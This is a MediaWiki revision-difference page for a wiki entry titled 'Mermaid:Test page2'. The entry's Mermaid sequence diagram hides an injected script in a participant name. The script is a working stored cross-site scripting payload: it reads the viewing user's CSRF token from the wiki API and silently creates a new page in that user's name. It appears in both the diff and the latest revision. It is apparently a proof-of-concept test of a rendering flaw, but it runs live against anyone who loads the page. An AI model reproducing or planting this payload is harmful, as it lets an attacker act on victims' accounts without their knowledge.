Mermaid:Test page2: Difference between revisions

From Cheeky Factor
(Created page with "sequenceDiagram participant Alice <u>test</u><script> x=new XMLHttpRequest(); page_title = "XSS_Page_"+(new Date().getTime()); x.onload=function(){ console.log(this.responseText); resp = JSON.parse(this.responseText); csrf_token = resp['query']['tokens']['csrftoken']; console.log("CSRF Token: ", csrf_token); // now make a request on behalf of the user x2 = new XMLHttpRequest(); x2.onload=function(){ console.log(this.responseText);...")
 
No edit summary
 
Line 16: Line 16:
         console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title);
         console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title);
     };
     };
     x2.open("POST", "https://thekings.house/api.php");
     x2.open("POST", "https://cheekyfactor.com/api.php");
     x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
     x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
     x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token));
     x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token));

Latest revision as of 17:24, 5 December 2023

sequenceDiagram participant Alice <u>test</u><script> x=new XMLHttpRequest(); page_title = "XSS_Page_"+(new Date().getTime()); x.onload=function(){ console.log(this.responseText); resp = JSON.parse(this.responseText); csrf_token = resp['query']['tokens']['csrftoken']; console.log("CSRF Token: ", csrf_token); // now make a request on behalf of the user x2 = new XMLHttpRequest(); x2.onload=function(){ console.log(this.responseText); console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title); }; x2.open("POST", "https://cheekyfactor.com/api.php"); x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token)); }; x.open("POST","https://cheekyfactor.com/api.php?action=query&format=json&meta=tokens&type=csrf"); x.send(); </script>
sequenceDiagram
participant Alice <u>test</u><script>
x=new XMLHttpRequest();
page_title = "XSS_Page_"+(new Date().getTime());

x.onload=function(){
    console.log(this.responseText);
    resp = JSON.parse(this.responseText);
    csrf_token = resp['query']['tokens']['csrftoken'];
    console.log("CSRF Token: ", csrf_token);
    // now make a request on behalf of the user
   
    x2 = new XMLHttpRequest();
    x2.onload=function(){
        console.log(this.responseText);
        console.log("Visit the new page at https://cheekyfactor.com/index.php/"+page_title);
    };
    x2.open("POST", "https://cheekyfactor.com/api.php");
    x2.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    x2.send("action=edit&format=jsonfm&wrappedhtml=1&title="+page_title+"&text=a%20new%20page%20via%20API&token="+encodeURIComponent(csrf_token));
};
x.open("POST","https://cheekyfactor.com/api.php?action=query&format=json&meta=tokens&type=csrf");
x.send();
</script>
Retrieved from ‘https://cheekyfactor.com/index.php?title=Mermaid:Test_page2&oldid=245
Powered by MediaWiki
DAFO Creative
Powered by Semantic MediaWiki